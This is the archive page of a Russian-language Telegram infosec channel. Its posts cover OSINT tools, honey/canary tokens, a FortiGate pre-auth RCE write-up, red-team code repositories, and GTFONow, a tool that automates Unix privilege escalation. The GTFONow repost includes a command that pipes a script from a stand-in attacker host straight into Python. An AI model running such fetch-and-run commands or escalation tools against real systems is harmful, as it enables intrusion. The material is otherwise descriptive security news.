ru
Feedback
Fsecurity | HH

Fsecurity | HH

Открыть в Telegram
2 010
Подписчики
+224 часа
-17 дней
-1030 день
Архив постов
🪞 Alfred — инструмент сбора информации OSINT Продвинутый инструмент для сбора информации, который находит учетные записи в с
🪞 Alfred — инструмент сбора информации OSINT Продвинутый инструмент для сбора информации, который находит учетные записи в соц. сетях. С помощью инструмента можно быстро сканировать сайты на наличие определённого имени пользователя. Утилита написана на Python и имеет простой интерфейс. 🪞 Вот вам ссылка на Github Rick Academy 🕵#osint

Попался Пока все массово обсуждают и пытаются понять, как это за пару месяцев в 2024 году утекло уже более 510 000 000 данных граждан нашей страны (что уже побило рекорд за весь прошлый год), предлагаю обсудить один достаточно интересный тип инструментов, который из профессиональной сферы начинает перетекать в бытовую, а имя ему – Honey Tokens. Да, это пост не только для кибербезопасников, а для всех, кто интересуется кибергигиеной. Мы с вами уже как-то разбирались в том, что такое HoneyPot, так вот, это его родственник. Если коротко, то эта штука позволяет обнаружить признаки и факт взлома любого вашего устройства или сервиса. Происходит это благодаря специальным меткам, маркерам или триггерам, которые умеют расставлять инструменты класса Honey Tokens. Более того, в некоторых случаях, можно даже вычислить источник взлома. Как же это работает. На самом деле, всё очень просто. Вы выбираете нужную приманку – например, текстовый файл с названием "Пароли" или папку с названием "Документы" (только не надо класть туда реальные пароли или сканы настоящих документов), а затем буквально устанавливаете на них сигнализацию. То есть, как только кто-то попробуем открыть этот файл или зайти в конкретную папку, вам отправится уведомление о том, что это произошло. Ну а теперь переходим от теории к практике – вы сами можете попробовать, как это работает, например, с Сanary Tokens. Через него вы сможете настроить ту самую сигнализацию на любой файл, ссылку, айпишник, электронную почту, папку и еще много чего. Уведомления именно в этом сервисе можно настроить на вашу почту. И да, всё это бесплатно и с понятным интерфейсом. Так что пользуйтесь на здоровье и делитесь с близкими. #Полезное Твой Пакет Безопасности

☝️ Демо работающего эксплойта к предыдущему исследованию

#research #CVE 🔎 Команда исследователей Assetnote представила очередной подробный ресёрч. На этот раз это pre-auth RCE в For
#research #CVE 🔎 Команда исследователей Assetnote представила очередной подробный ресёрч. На этот раз это pre-auth RCE в FortiGate SSLVPN (CVE-2024-21762). 🧰 Под катом вас ждет подробное описание каждого шага: от извлечения бинарей до создания работающего эксплойта👇

Проходя одну машину на HackTheBox, в поисках нашел эту статью: 🔗 Ссылка: https://habr.com/ru/companies/rvision/articles/686784/ Советую почитать 👾

Хочу также посоветовать: 1 - Проверить себя на утечки! 💧 2 - Наш discord сервер! Где можно пообщаться 👾 3 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

sticker.webp0.29 KB

Repost from N/a
Как вам ? 🤔
Anonymous voting

Repost from N/a
https://fsecurity.gitbook.io/blog 👆🏻 Веду работы, по этой штуке 👾

Repost from Cybred
RustRedOps Репозиторий со сниппетами кода, которые могут быть полезны при написании Red Team инструментов. Знакомые техники бинарной эксплуатации, переписанные на Rust.

sticker.webp0.21 KB

Нас уже 1104 🥳 Всем спасибо 👾 Желаю всем здоровья и счастья! 🦑

🐱 Набор ресурсов по информационной безопасности Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто
🐱 Набор ресурсов по информационной безопасности Цель этого проекта – выступить в качестве бесплатного ресурса для всех, кто заинтересован в получении дополнительной информации об информационной безопасности. В репозитории вы найдете: 1. Анонимность 2. Основная информация о безопасности 3. Построение лаборатории для пентеста 4. Взлом автомобиля 5. OSINT 6. Фишинг 7. Социальная инженерия 8. Моделирование угроз и многое другое
«Как американцы с таким трудом усвоили в последнем столетии существования Земли, свободный поток информации является единственной гарантией от тирании. Некогда закованные в цепи люди, чьи лидеры, наконец, теряют контроль над информационным потоком, вскоре обретут свободу и жизненную силу, но свободная нация, постепенно сужающая свою власть над общественным дискурсом, начала свое стремительное сползание к деспотизму. Остерегайтесь того, кто откажет вам в доступе к информации, ибо в глубине души он мечтает стать вашим хозяином» - Комиссар Правин Лал
🗄 Репозиторий – линк. // Не хакинг, а ИБ

Repost from Kali Linux
💻 В этом посте поговорим об инструменте `GTFONow` Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins. Основные особенности: 🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo. 🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid. 🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС. 🗄Автоматическая эксплуатация через SSH‑ключи. 🗄Автоматическая эксплуатация через файл используемый в cron. 🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD. 🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python 🖥 GTFONow @linuxkalii

😈 OSINT: сборник докладов В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведён
😈 OSINT: сборник докладов В этом посте собрали для вас подборку докладов с разных форумов, митапов и конференций. В приведённом ниже списке мы рассмотрим основные методы и инструменты OSINT, которые могут помочь вам получить нужную информацию для различных целей - от исследования рынка до проверки подлинности фотографий и расследования преступлений. — Мы также обсудим, как правильно проводить поиск в интернете, как анализировать информацию и как сохранять ее для дальнейшего использования, а также узнаете, как определить надежность источника информации, а также как избегать ложной информации. 1. OSINT: Введение в специальность 2. Общедоступная и неочевидная практика OSINT, методы и кейсы 3. OSINT в расследовании киберинцидентов 4. Shadow OSINT: information leaks usage 5. Боевой OSINT: когда открытых источников не хватает. #OSINT #Recon | 🧑‍💻 Этичный хакер